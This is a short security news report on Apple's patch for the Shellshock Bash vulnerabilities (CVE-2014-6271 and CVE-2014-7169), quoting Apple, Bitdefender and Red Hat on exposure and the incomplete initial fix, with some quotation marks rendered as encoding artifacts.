Apple has patched the Shellshock vulnerabilities almost a week after the first disclosure, according to media reports. The company said a “vast majority” of OS X users werenâ€™t at risk, as the systems were safe â€œby default and not exposed to remote exploits of [GNU Bash] unless users configure advanced UNIX services.â€
Bitdefenderâ€™s analysis shows the typical attack scenario recalls a vulnerable script, together with passing the exploit code as the User-Agent string. Bitdefender advises Mac OS X users to update immediately.
Initially identified and patched as a single issue (CVE-2014-6271), the Bash flaw also got CVE-2014-7169 added in the vulnerability queue, patched on Sept. 26. In the meantime, the Bash security flaws were actively exploited by attackers.
“It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables,” Linux vendor Red Hat said. “An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands.”
The company warned the initial patch continued to allow unauthenticated access to several applications and services, which could still be exploited by attackers.
Bash is a UNIX command shell built into OS X as well as other UNIX-based systems including Linux, Red Hat, Debian and Ubuntu.